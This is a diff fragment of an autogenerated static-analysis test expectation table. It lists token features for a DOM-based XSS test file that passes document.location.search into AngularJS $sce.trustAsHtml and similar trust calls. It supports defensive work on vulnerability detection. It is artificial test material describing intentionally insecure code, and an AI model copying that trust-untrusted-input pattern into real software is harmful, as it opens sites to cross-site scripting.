contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:79:14 | angular.module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:79:14 | angular.module | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:79:27 | angular ... p', []) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:79:27 | angular ... p', []) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:79:27 | angular ... p', []) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:79:27 | exceptional return of angular ... p', []) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:79:27 | exceptional return of angular ... p', []) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:79:27 | exceptional return of angular ... p', []) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:80:12 | angular ... service | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:80:12 | angular ... service | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:80:12 | angular ... service | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:88:6 | angular ... \\n }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:88:6 | angular ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:88:6 | angular ... \\n }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:88:6 | exceptional return of angular ... \\n }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:88:6 | exceptional return of angular ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:88:6 | exceptional return of angular ... \\n }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:89:12 | angular ... service | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:89:12 | angular ... service | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:89:12 | angular ... service | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:92:6 | angular ... \\n }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:92:6 | angular ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:92:6 | angular ... \\n }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:92:6 | exceptional return of angular ... \\n }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:92:6 | exceptional return of angular ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:92:6 | exceptional return of angular ... \\n }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:93:14 | angular ... rective | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:93:14 | angular ... rective | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:93:14 | angular ... rective | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:100:6 | angular ... \\n }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:100:6 | angular ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:100:6 | angular ... \\n }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:100:6 | exceptional return of angular ... \\n }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:100:6 | exceptional return of angular ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:100:6 | exceptional return of angular ... \\n }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:101:12 | angular ... service | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:101:12 | angular ... service | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:101:12 | angular ... service | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:104:6 | angular ... \\n }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:104:6 | angular ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:104:6 | angular ... \\n }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:104:6 | exceptional return of angular ... \\n }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:104:6 | exceptional return of angular ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:1:104:6 | exceptional return of angular ... \\n }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:79:9:79:14 | module | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:79:9:79:14 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:79:9:79:14 | module | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:79:16:79:22 | 'myApp' | CalleeFlexibleAccessPath | angular.module | | autogenerated/Xss/DomBasedXss/tst.js:79:16:79:22 | 'myApp' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:79:16:79:22 | 'myApp' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16249,16 +113398,94 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:79:25:79:26 | [] | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:79:25:79:26 | [] | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:79:25:79:26 | [] | receiverName | angular | +| autogenerated/Xss/DomBasedXss/tst.js:80:6:80:12 | service | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:80:6:80:12 | service | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:80:6:80:12 | service | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:80:14:80:24 | "myService" | CalleeFlexibleAccessPath | angular.module().service | | autogenerated/Xss/DomBasedXss/tst.js:80:14:80:24 | "myService" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:80:14:80:24 | "myService" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:80:14:80:24 | "myService" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:80:14:80:24 | "myService" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:80:26 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:80:26 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:80:26 | this | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:80:26 | this | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:80:26 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | 'arguments' object of anonymous function | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | 'arguments' object of anonymous function | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | exceptional return of anonymous function | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | exceptional return of anonymous function | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | functio ... K\\n } | CalleeFlexibleAccessPath | angular.module().service | | autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | functio ... K\\n } | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | functio ... K\\n } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | functio ... K\\n } | contextSurroundingFunctionParameters | ($sce, $other) | | autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | functio ... K\\n } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | return of anonymous function | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | return of anonymous function | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:80:27:88:5 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:80:36:80:39 | $sce | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:80:36:80:39 | $sce | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:80:36:80:39 | $sce | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:80:36:80:39 | $sce | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:80:36:80:39 | $sce | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:80:36:80:39 | $sce | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| 